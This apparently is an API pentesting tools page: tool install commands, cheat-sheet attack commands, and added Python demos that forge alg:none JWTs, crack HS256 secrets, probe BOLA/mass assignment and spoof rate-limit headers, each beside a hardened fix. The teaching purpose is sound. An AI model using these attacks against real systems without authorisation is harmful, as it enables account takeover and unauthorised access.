Tools & Resources
🌱 Beginner

API Pentesting Tools

A curated list of tools specifically designed for API reconnaissance, analysis, and exploitation.

Postman

Client / Testing
Docs

The most popular API client. Essential for manual testing, organizing collections, and automating requests.

Installation

bash
brew install --cask postman

Burp Suite

Proxy / Scanner
Docs

The industry standard web proxy. Use it to intercept, modify, and scan API traffic.

Installation

bash
# Download the installer (Community or Professional) from portswigger.net

Kiterunner

Reconnaissance
Docs

A high-performance API content discovery tool. Excellent for finding hidden endpoints.

Installation

bash
brew install kiterunner

Arjun

Reconnaissance
Docs

HTTP parameter discovery suite. Finds hidden query parameters in API endpoints.

Installation

bash
pip3 install arjun

ffuf

Fuzzing
Docs

Fast web fuzzer written in Go. Great for directory and endpoint discovery.

Installation

bash
go install github.com/ffuf/ffuf@latest

jwt_tool

Authentication
Docs

A toolkit for testing, tweaking, and cracking JSON Web Tokens (JWTs).

Installation

bash
git clone https://github.com/ticarpi/jwt_tool

SQLMap

Exploitation
Docs

Automatic SQL injection and database takeover tool. Works well on API endpoints.

Installation

bash
brew install sqlmap

InQL

GraphQL
Docs

A Burp Suite extension for GraphQL security testing. Introspection, scanner, and more.

Installation

bash
# Install via Burp BApp Store

grpcurl

gRPC
Docs

Like curl, but for gRPC. Interact with gRPC servers from the command line.

Installation

bash
brew install grpcurl

Amass

Reconnaissance
Docs

In-depth attack surface mapping and asset discovery.

Installation

bash
brew install amass

Nuclei

Scanning
Docs

Fast, template-based vulnerability scanner. Has hundreds of API-specific templates for common misconfigurations and CVEs.

Installation

bash
go install github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest

Caido

Proxy / Testing
Docs

Modern web security proxy — a lightweight Burp Suite alternative with a clean UI, built-in replay, and HTTPQL query language.

Installation

bash
# Download from caido.io

graphql-cop

GraphQL
Docs

Security auditing tool for GraphQL. Checks introspection, batching, field suggestions, persisted queries, and DoS vectors.

Installation

bash
pip3 install graphql-cop

mitmproxy

Proxy / Scripting
Docs

Interactive TLS-capable intercepting proxy. Scriptable in Python. Excellent for automated API traffic manipulation and gRPC interception.

Installation

bash
brew install mitmproxy

HTTPie

Client / Testing
Docs

User-friendly HTTP client for the terminal. Great for quick manual API testing with readable output and session support.

Installation

bash
brew install httpie

Schemathesis

Fuzzing / Automation
Docs

Property-based API testing powered by OpenAPI/GraphQL schemas. Automatically generates test cases from your spec and finds edge cases scanners miss.

Installation

bash
pip3 install schemathesis

RESTler

Fuzzing / Automation
Docs

Microsoft's stateful REST API fuzzer. Infers producer-consumer dependencies from Swagger specs and generates intelligent sequences of API calls.

Installation

bash
# RESTler is not published as a dotnet tool; build it from source (needs the .NET SDK and Python 3)
git clone https://github.com/microsoft/restler-fuzzer
cd restler-fuzzer && python3 ./build-restler.py --dest_dir "$HOME/restler_bin"

Cherrybomb

Static Analysis
Docs

CLI tool for API security validation — checks OpenAPI specs for OWASP API Top 10 risks, broken auth, excessive data exposure, and missing rate limits.

Installation

bash
cargo install cherrybomb

clairvoyance

GraphQL
Docs

Reconstruct GraphQL schemas when introspection is disabled by exploiting field suggestion error messages.

Installation

bash
pip3 install clairvoyance

wscat

WebSocket
Docs

WebSocket client for the terminal. Connect, send messages, and test WebSocket APIs from the command line.

Installation

bash
npm install -g wscat

Reconnaissance

ffuf -u https://target.com/FUZZ -w api-endpoints.txt
kr scan https://target.com -w routes-large.kite
arjun -u https://target.com/api/users -m GET
curl -s https://target.com/swagger.json | jq .

JWT Attacks (jwt_tool)

python3 jwt_tool.py JWT -X a                 # alg:none (also tries None/NONE/nOnE spellings)
python3 jwt_tool.py JWT -C -d rockyou.txt    # dictionary attack on the HS256 secret (offline)
python3 jwt_tool.py JWT -X k -pk pub.pem     # RS256 -> HS256 key confusion, using the public key as HMAC secret
hashcat -m 16500 jwt.txt rockyou.txt         # same dictionary attack, GPU accelerated
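
The first two attacks above in working code, as an added example that is not part of the original page or of jwt_tool. It implements just enough of JWT (base64url, HS256) to mint a token, forge the `alg:none` variant of it, run an offline dictionary attack on the secret, and show why the fix is to pin the algorithm server-side rather than trust the one in the header. The secret `secret123`, the claims and the wordlist are constructed for the demo; the key-confusion attack has the same root cause (the verifier lets the token choose the algorithm) and is left out only because it needs RSA.

```python
import base64
import hashlib
import hmac
import json
from typing import Iterable, Optional


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _signing_input(header: dict, payload: dict) -> str:
    def enc(obj: dict) -> str:
        return b64url_encode(json.dumps(obj, separators=(",", ":")).encode())
    return enc(header) + "." + enc(payload)


def hs256_sign(payload: dict, secret: bytes) -> str:
    """Mint a normal HS256 token, i.e. what the target does at login."""
    signing_input = _signing_input({"alg": "HS256", "typ": "JWT"}, payload)
    sig = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(sig)


def forge_none(token: str, **claim_changes) -> str:
    """jwt_tool -X a: set alg to 'none', edit claims, drop the signature.
    jwt_tool also tries 'None', 'NONE' and 'nOnE' to defeat sloppy string checks."""
    header_b64, payload_b64, _ = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    payload = json.loads(b64url_decode(payload_b64))
    header["alg"] = "none"
    payload.update(claim_changes)
    return _signing_input(header, payload) + "."        # empty third segment


def crack_hs256(token: str, wordlist: Iterable[str]) -> Optional[bytes]:
    """jwt_tool -C -d / hashcat -m 16500: recompute the MAC for each candidate
    secret. Fully offline, so a weak secret is recovered without touching the target."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    signing_input = f"{header_b64}.{payload_b64}".encode()
    target = b64url_decode(sig_b64)
    for word in wordlist:
        candidate = word.encode()
        digest = hmac.new(candidate, signing_input, hashlib.sha256).digest()
        if hmac.compare_digest(digest, target):
            return candidate
    return None


def verify_vulnerable(token: str, secret: bytes) -> Optional[dict]:
    """Dispatches on the alg the token declares, which the attacker controls."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    payload = json.loads(b64url_decode(payload_b64))
    if header.get("alg") == "none":
        return payload                                   # BUG: unsigned token accepted
    if header.get("alg") == "HS256":
        expected = hmac.new(secret, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
        if hmac.compare_digest(expected, b64url_decode(sig_b64)):
            return payload
    return None


def verify_hardened(token: str, secret: bytes) -> Optional[dict]:
    """Pins the algorithm server-side, then checks the MAC in constant time."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    if header.get("alg") != "HS256":                     # the token never picks the algorithm
        return None
    expected = hmac.new(secret, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
        return None
    return json.loads(b64url_decode(payload_b64))


if __name__ == "__main__":
    SECRET = b"secret123"                                # constructed weak secret
    token = hs256_sign({"sub": "1001", "role": "user"}, SECRET)
    forged = forge_none(token, role="admin")
    print("vulnerable verifier, alg=none:", verify_vulnerable(forged, SECRET))
    print("hardened verifier,   alg=none:", verify_hardened(forged, SECRET))
    print("recovered secret:", crack_hs256(token, ["password", "letmein", "secret123"]))
```

Run it against a token captured from the target by replacing `token`; if `crack_hs256` returns a secret, you can mint any claims with `hs256_sign`, which is the real impact behind the `-C` line above.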

BOLA / BFLA Testing

# Swap object IDs between two accounts you control and diff the responses
GET /api/users/VICTIM_ID        (attacker token; 200 instead of 403 = BOLA)
GET /api/admin/users            (non-admin token; 200 = BFLA)
PUT /api/users/1 -d role=admin  (mass assignment / privilege escalation)
DELETE /api/users/OTHER_ID      (destructive: only ever against your own test accounts)
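
The four probes above as a runnable check, added here as an example and not taken from the page or any real target. Because it has to run offline, the "target" is a constructed in-memory API (`FakeApi`) with three fixture users and opaque tokens; `authorize=False` reproduces the missing ownership, role and field checks, `authorize=True` is the same server with each check in place, so the two runs show exactly which line fixes which finding.

```python
import copy
import re

# Constructed fixture: two ordinary users, one admin, opaque bearer tokens.
USERS = {
    1: {"id": 1, "email": "alice@example.com", "role": "user"},
    2: {"id": 2, "email": "bob@example.com", "role": "user"},
    3: {"id": 3, "email": "root@example.com", "role": "admin"},
}
TOKENS = {"tok-alice": 1, "tok-bob": 2, "tok-admin": 3}
WRITABLE = {"email"}          # fields a user may change on their own record


class FakeApi:
    """In-memory stand-in for the target. authorize=False has the bugs the cheat
    sheet probes for; authorize=True is the fixed server."""

    def __init__(self, authorize: bool):
        self.users = copy.deepcopy(USERS)
        self.authorize = authorize

    def handle(self, method: str, path: str, token: str, body: dict = None):
        me = self.users.get(TOKENS.get(token))
        if me is None:
            return 401, None                           # authentication works fine...
        m = re.fullmatch(r"/api/users/(\d+)", path)
        if m:
            target = self.users.get(int(m.group(1)))
            if target is None:
                return 404, None
            owner_or_admin = target["id"] == me["id"] or me["role"] == "admin"
            if self.authorize and not owner_or_admin:
                return 403, None                       # ownership check: fixes BOLA
            if method == "GET":
                return 200, dict(target)
            if method == "PUT":
                updates = dict(body or {})
                if self.authorize and me["role"] != "admin":
                    # allow-list of writable fields: fixes mass assignment of role
                    updates = {k: v for k, v in updates.items() if k in WRITABLE}
                target.update(updates)
                return 200, dict(target)
            if method == "DELETE":
                del self.users[target["id"]]
                return 204, None
        if path == "/api/admin/users" and method == "GET":
            if self.authorize and me["role"] != "admin":
                return 403, None                       # role check: fixes BFLA
            return 200, list(self.users.values())
        return 404, None


def run_checks(api: FakeApi, attacker: str = "tok-alice", victim_id: int = 2) -> list:
    """Run the cheat-sheet probes as the attacker; a 2xx where the fixed server
    answers 403 is a finding. Order matters: the destructive DELETE goes last."""
    findings = []
    status, _ = api.handle("GET", f"/api/users/{victim_id}", attacker)
    if status == 200:
        findings.append(f"BOLA: GET /api/users/{victim_id} readable with attacker token")
    status, _ = api.handle("GET", "/api/admin/users", attacker)
    if status == 200:
        findings.append("BFLA: GET /api/admin/users served to a non-admin")
    me_id = TOKENS[attacker]
    status, body = api.handle("PUT", f"/api/users/{me_id}", attacker, {"role": "admin"})
    if status == 200 and body.get("role") == "admin":
        findings.append(f"Mass assignment: PUT /api/users/{me_id} role=admin escalated privileges")
    status, _ = api.handle("DELETE", f"/api/users/{victim_id}", attacker)
    if status == 204:
        findings.append(f"BOLA: DELETE /api/users/{victim_id} succeeded with attacker token")
    return findings


if __name__ == "__main__":
    print("vulnerable:", run_checks(FakeApi(authorize=False)))
    print("fixed:     ", run_checks(FakeApi(authorize=True)))
```

Against a real target, `FakeApi.handle` is the only piece you replace (with a `requests` call carrying the token in `Authorization`); the point of keeping the probes in `run_checks` is that the same differential logic, attacker token versus victim object, applies to every object-bearing route you find during recon.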

Rate Limit Bypass Headers

X-Forwarded-For: 127.0.0.1
X-Real-IP: 10.0.0.1
CF-Connecting-IP: 1.2.3.4
True-Client-IP: 1.2.3.5
X-Originating-IP: 192.168.1.1
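
Why those headers work, and what the fix looks like, as an added example that is not from the page. It models a rate limiter keyed on the client address: `client_ip_naive` trusts whichever of the headers above arrives first, so an attacker who rotates the value gets a fresh bucket per request; `client_ip_hardened` only reads `X-Forwarded-For`, only when the TCP peer is one of the operator's own proxies, and only takes the right-most hop that is not a proxy. The topology (one proxy in `10.0.0.0/8`, attacker at `203.0.113.7`) and the limit of 5 are constructed for the demo.

```python
import ipaddress
from collections import defaultdict

# Constructed topology: the app normally sits behind a reverse proxy in 10.0.0.0/8.
TRUSTED_PROXIES = ["10.0.0.0/8"]
LIMIT = 5                                  # requests per client (window handling omitted)
SPOOFABLE = ("x-forwarded-for", "x-real-ip", "cf-connecting-ip",
             "true-client-ip", "x-originating-ip")


def _is_trusted(ip: str, trusted) -> bool:
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in trusted)


def client_ip_naive(peer: str, headers: dict) -> str:
    """Vulnerable: the first spoofable header wins, so the bucket key is attacker chosen."""
    headers = {k.lower(): v for k, v in headers.items()}
    for name in SPOOFABLE:
        if name in headers:
            return headers[name].split(",")[0].strip()
    return peer


def client_ip_hardened(peer: str, headers: dict, trusted=None) -> str:
    """X-Forwarded-For only, only from our own proxy, right-most untrusted hop.
    The proxy appends the real client last; everything left of it came from the client."""
    trusted = [ipaddress.ip_network(n) for n in (trusted or TRUSTED_PROXIES)]
    if not _is_trusted(peer, trusted):
        return peer                        # direct connection: every header is attacker data
    headers = {k.lower(): v for k, v in headers.items()}
    hops = [h.strip() for h in headers.get("x-forwarded-for", "").split(",") if h.strip()]
    for hop in reversed(hops):
        if not _is_trusted(hop, trusted):
            try:
                return str(ipaddress.ip_address(hop))   # normalise; garbage falls back to peer
            except ValueError:
                break
    return peer


class RateLimiter:
    def __init__(self, keyfunc, limit: int = LIMIT):
        self.keyfunc, self.limit = keyfunc, limit
        self.counts = defaultdict(int)

    def allow(self, peer: str, headers: dict) -> bool:
        key = self.keyfunc(peer, headers)
        self.counts[key] += 1
        return self.counts[key] <= self.limit


def simulate_bypass(keyfunc, attempts: int = 20, peer: str = "203.0.113.7",
                    via_proxy: bool = False) -> int:
    """Attacker sends `attempts` requests, rotating X-Forwarded-For each time.
    Returns how many the limiter let through (5 means the limiter held)."""
    limiter = RateLimiter(keyfunc)
    allowed = 0
    for i in range(attempts):
        spoof = f"127.0.0.{i + 1}"
        if via_proxy:
            # our proxy forwards the request and appends the real client address
            ok = limiter.allow("10.0.0.2", {"X-Forwarded-For": f"{spoof}, {peer}"})
        else:
            ok = limiter.allow(peer, {"X-Forwarded-For": spoof})
        allowed += ok
    return allowed


if __name__ == "__main__":
    print("naive, direct:     ", simulate_bypass(client_ip_naive))
    print("naive, via proxy:  ", simulate_bypass(client_ip_naive, via_proxy=True))
    print("hardened, direct:  ", simulate_bypass(client_ip_hardened))
    print("hardened, via proxy:", simulate_bypass(client_ip_hardened, via_proxy=True))
```

When testing, send the headers one at a time and vary the value on every request: a limiter that keys on the header will show a reset counter, one that keys on the socket peer will not. If the target's real proxy prepends rather than appends (some do), the hardened logic must be mirrored accordingly, which is why it takes the proxy list as a parameter.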

GraphQL

graphql-cop -t https://api.target.com/graphql
python3 -m clairvoyance URL -o schema.json
{"query":"{ __schema{types{name}} }"}  # introspect
[{"query":"..."},{"query":"..."}]       # batch

gRPC

grpcurl -plaintext HOST:PORT list                          # needs server reflection
grpcurl -plaintext HOST:PORT describe SVC
grpcurl -plaintext -d '{"id":1}' HOST:PORT SVC/Method
grpcui -plaintext HOST:PORT                                # web UI
protoc --decode_raw < captured.bin                         # schema-less decode of a raw message body
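
What `protoc --decode_raw` does under the hood, written out as an added example (not from the page, grpcurl or protoc): a parser for the gRPC length-prefixed framing and the protobuf wire format that needs no `.proto` file. This is what you reach for when reflection is disabled and all you have is a DATA frame captured with mitmproxy. The sample frame is constructed by hand and encodes `{1: 150, 2: "alice", 3: {1: 1}}`; field names are unrecoverable without the schema, only numbers and wire types are.

```python
import struct

# Constructed sample: one uncompressed gRPC frame (flag 0x00, length 0x0e) whose
# body is field 1 = varint 150, field 2 = "alice", field 3 = nested {field 1 = 1}.
SAMPLE_FRAME = bytes.fromhex("000000000e0896011205616c6963651a020801")


def read_varint(buf: bytes, pos: int):
    """Base-128 varint: 7 bits per byte, low group first, MSB set = more to come."""
    result, shift = 0, 0
    while True:
        if pos >= len(buf):
            raise ValueError("truncated varint")
        byte = buf[pos]
        pos += 1
        result |= (byte & 0x7F) << shift
        if not byte & 0x80:
            return result, pos
        shift += 7
        if shift > 63:
            raise ValueError("varint longer than 10 bytes")


def decode_raw(buf: bytes) -> dict:
    """Schema-less decode: {field number: [values]}. A length-delimited field is
    tried as a nested message first and kept as bytes if that fails, exactly the
    ambiguity protoc --decode_raw has (a short string can also parse as a message)."""
    fields, pos = {}, 0
    while pos < len(buf):
        key, pos = read_varint(buf, pos)
        field_no, wire_type = key >> 3, key & 0x7
        if field_no == 0:
            raise ValueError("field number 0 is invalid")
        if wire_type == 0:                                   # varint
            value, pos = read_varint(buf, pos)
        elif wire_type == 1:                                 # fixed64 / double
            if pos + 8 > len(buf):
                raise ValueError("truncated fixed64")
            value = struct.unpack_from("<Q", buf, pos)[0]
            pos += 8
        elif wire_type == 2:                                 # length-delimited
            length, pos = read_varint(buf, pos)
            chunk = buf[pos:pos + length]
            if len(chunk) != length:
                raise ValueError("truncated length-delimited field")
            pos += length
            try:
                value = decode_raw(chunk) if chunk else b""
            except ValueError:
                value = chunk                                # string, bytes or packed repeated
        elif wire_type == 5:                                 # fixed32 / float
            if pos + 4 > len(buf):
                raise ValueError("truncated fixed32")
            value = struct.unpack_from("<I", buf, pos)[0]
            pos += 4
        else:
            raise ValueError(f"unsupported wire type {wire_type} (groups are deprecated)")
        fields.setdefault(field_no, []).append(value)
    return fields


def split_grpc_frames(stream: bytes) -> list:
    """gRPC DATA payload = repeated [1 byte compressed flag][4 byte big-endian length][message]."""
    frames, pos = [], 0
    while pos < len(stream):
        if len(stream) - pos < 5:
            raise ValueError("truncated gRPC frame header")
        compressed = stream[pos]
        length = struct.unpack_from(">I", stream, pos + 1)[0]
        pos += 5
        body = stream[pos:pos + length]
        if len(body) != length:
            raise ValueError("truncated gRPC message")
        pos += length
        if compressed:
            raise ValueError("compressed message: undo the grpc-encoding first")
        frames.append(body)
    return frames


def pretty(fields: dict, indent: int = 0) -> str:
    """Render in protoc --decode_raw style: `1: 150`, `2: "alice"`, `3 { ... }`."""
    out, pad = [], "  " * indent
    for no, values in fields.items():
        for v in values:
            if isinstance(v, dict):
                out.append(f"{pad}{no} {{")
                out.append(pretty(v, indent + 1))
                out.append(f"{pad}}}")
            elif isinstance(v, bytes):
                try:
                    text = v.decode("utf-8")
                    out.append(f'{pad}{no}: "{text}"')
                except UnicodeDecodeError:
                    out.append(f"{pad}{no}: {v.hex()}")
            else:
                out.append(f"{pad}{no}: {v}")
    return "\n".join(out)


if __name__ == "__main__":
    for body in split_grpc_frames(SAMPLE_FRAME):
        print(pretty(decode_raw(body)))
```

Feed it a mitmproxy flow's response body (`flow.response.raw_content` in a script) instead of `SAMPLE_FRAME` and you get the same view as `protoc --decode_raw`, which is usually enough to spot IDs and role fields worth swapping in a BOLA probe before you have recovered a schema.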